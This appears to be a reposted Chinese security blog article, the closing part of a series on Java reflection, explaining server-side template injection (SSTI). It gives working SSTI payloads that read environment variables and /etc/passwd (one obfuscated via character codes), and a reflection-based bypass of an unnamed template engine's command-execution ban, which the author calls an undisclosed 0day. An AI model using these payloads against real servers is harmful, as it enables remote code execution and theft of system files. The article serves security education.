从安全角度谈Java反射机制--终章

本文主要是介绍从安全角度谈Java反射机制--终章，希望对大家解决编程问题提供一定的参考价值，需要的开发者们随着小编来一起学习吧！

前言

首发：https://www.sec-in.com/article/309
   通过前两章的了解，大家对Java反射机制有了一定的认知。本章作为反射篇的最终章，如果从反序列化的层面来说Java反射的具体危害，需要一些反序列化的基础知识。故笔者决定从反射机制本身来说，它的一个经常被使用的点—Server-Side Template Injection（简称SSTI），中文名服务器端模板注入。

---

SSTI

   模板引擎被广泛应用于Web应用程序中，通过网页和电子邮件呈现动态数据。将用户输入内容不安全嵌入到模板中，实现服务器端模板注入。SSTI极其容易被误认为是跨站点脚本（XSS），大多数人经常与之擦肩而过。与XSS不同的是，模板注入可以用于直接攻击Web服务器内部，并经常获得远程代码执行（RCE）。模板注入可以通过开发人员的错误配置，通过故意暴露模板，开发人员试图通过来其提供丰富的功能，就像维基、博客、营销应用和内容管理等系统。
  先看通用的Java SSTI的payload，payload中的T通常是需要声明的变量，每一个模板引擎都不同。在这里，我们不能发现已经可以看到反射的“影子”了，下面会从每一个模板来具体分析介绍任何使用反射从SSTI到RCE。

1. 获取系统环境变量

${T(java.lang.System).getenv()}

2. 读取文件内容

• ${T(java.lang.Runtime).getRuntime().exec(‘cat etc/passwd’)}
• ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}

---

Template

前言

   这里模板引擎是国内的模板引擎，漏洞还未必收录，故暂不公布，这里只做学习研究。如果你无意中接触过这个模板，如果你认出了这个模板，那么恭喜你获得0day一枚。笔者有一个请求如果你认出了，就不要公布了，0day你自己知道就好了。此款模板引擎禁止使用了java.lang.Runtime和java.lang.ProcessBuilder类的使用，使用Java的反射机制完美的bypass。

payload构造

${@java.lang.Class.forName("java.lang.Runtime").getMethod("exec",
@java.lang.Class.forName("java.lang.String")).invoke(
@java.lang.Class.forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null),"calc")}

1. 我们且看第一行，按照上面给出简单案例方法，我们应该这样子就可以了@java.lang.Class.forName("java.lang.Runtime").getMethod("exec",String.class).invoke(newInstance(),"calc")
2. 但是直接String.class直接写模板是找不到的，所以我们得继续构造payload，将String.class转化@java.lang.Class.forName("java.lang.String")的形式，然后payload就变成下面这样子了。@java.lang.Class.forName("java.lang.Runtime").getMethod("exec",@java.lang.Class.forName("java.lang.String")).invoke(newInstance(),"calc")
3. 照道理上面就可以直接使用了，但是呢Runtime类没有无参构造方法，因此不能使用newInstance()方法来实例化。只能通过调用getRuntime()方法来进行实例化。所以newInstance()得替换成@java.lang.Class.forName("java.lang.Runtime").getMethod("getRuntime",null)最终payload就变成了下面这样子。

${@java.lang.Class.forName<

这篇关于从安全角度谈Java反射机制--终章的文章就介绍到这儿，希望我们推荐的文章对编程师们有所帮助！

---